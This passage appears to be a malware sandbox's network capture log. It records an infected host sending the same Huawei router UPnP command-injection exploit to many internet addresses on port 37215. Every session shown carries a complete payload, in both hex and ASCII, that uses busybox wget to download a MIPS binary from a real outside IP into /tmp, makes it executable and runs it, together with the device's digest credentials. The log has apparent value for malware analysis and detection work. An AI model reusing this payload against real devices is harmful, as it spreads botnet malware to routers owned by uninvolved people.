33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    657192.168.2.2359834197.148.128.837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306153059 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    658192.168.2.2336014156.35.92.13837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306633949 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    659192.168.2.235208841.174.41.19637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306668997 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    660192.168.2.2337724156.246.84.4137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306705952 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    661192.168.2.2344436156.142.205.537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306737900 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    662192.168.2.235038041.223.56.12437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306780100 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    663192.168.2.2346756156.208.201.6537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306811094 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    664192.168.2.2349334197.141.16.24437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306869984 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    665192.168.2.2334652156.60.77.24637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306900978 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    666192.168.2.234862041.121.54.21137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306951046 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    667192.168.2.234780041.18.209.937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307041883 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
